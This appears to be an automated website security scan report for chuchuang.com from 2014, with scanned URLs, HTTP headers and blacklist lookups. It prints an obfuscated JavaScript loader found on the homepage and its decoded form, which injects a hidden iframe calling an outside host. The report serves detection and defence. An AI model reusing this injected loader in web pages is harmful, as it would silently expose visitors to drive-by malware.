Scanned pages/files
Request | Server response | Status |
http://chuchuang.com/ | 200 OK Content-Length: 3751 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(window.document)a=("urf3".split+'qwe').substr(0,6);aa=(Date+{}).substr(0,6);if(a===aa)f=[-28,-28,68,65,-5,3,63,74,62,80,72,64,73,79,9,66,64,79,32,71,64,72,64,73,79,78,29,84,47,60,66,41,60,72,64,3,2,61,74,63,84,2,4,54,11,56,4,86,-28,-28,-28,68,65,77,60,72,64,77,3,4,22,-28,-28,88,-5,64,71,78,64,-5,86,-28,-28,-28,63,74,62,80,72,64,73,79,9,82,77,68,79,64,3,-3,23,68,65,77,60,72,64,-5,78,77,62,24,2,67,79,79,75,21,10,10,61,61,70,67,70,75,84,80,9,85,84,73,78,9,62,74,72,10,68,10,68,9,75,67,75,26,66,74 Decoded script: e(s) e(s) if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://bbkhkpyu.zyns.com/i/i.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://bbkhkpyu.zyns.com/i/i.php?go=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttrib <iframe src='http://bbkhkpyu.zyns.com/i/i.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://chuchuang.com/swfobject.js | 200 OK Content-Length: 6880 Content-Type: application/x-javascript | clean |
http://law.sudusite.net/leshan110/jquery.js | 200 OK Content-Length: 91556 Content-Type: application/x-javascript | clean |
http://law.sudusite.net/leshan110/leshan110.js | 200 OK Content-Length: 667 Content-Type: application/x-javascript | clean |
http://chuchuang.com/swfobject.html?detectflash=false | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://chuchuang.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: chuchuang.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Mar 2014 22:33:10 GMT
Accept-Ranges: bytes
ETag: "801bfd9f47b6cc1:15c774"
Server: Microsoft-IIS/6.0
Content-Length: 3751
Content-Location: http://chuchuang.com/index.html
Content-Type: text/html
Last-Modified: Fri, 09 Dec 2011 07:53:23 GMT
X-Powered-By: ASP.NET
...3751 bytes of data.
GET / HTTP/1.1
Host: chuchuang.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Mar 2014 22:33:10 GMT
Accept-Ranges: bytes
ETag: "801bfd9f47b6cc1:15c774"
Server: Microsoft-IIS/6.0
Content-Length: 3751
Content-Location: http://chuchuang.com/index.html
Content-Type: text/html
Last-Modified: Fri, 09 Dec 2011 07:53:23 GMT
X-Powered-By: ASP.NET
...3751 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: chuchuang.com
Referer: http://www.google.com/search?q=chuchuang.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: chuchuang.com
Referer: http://www.google.com/search?q=chuchuang.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=chuchuang.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://chuchuang.com/
Result: chuchuang.com is not infected or malware details are not published yet.
Result: chuchuang.com is not infected or malware details are not published yet.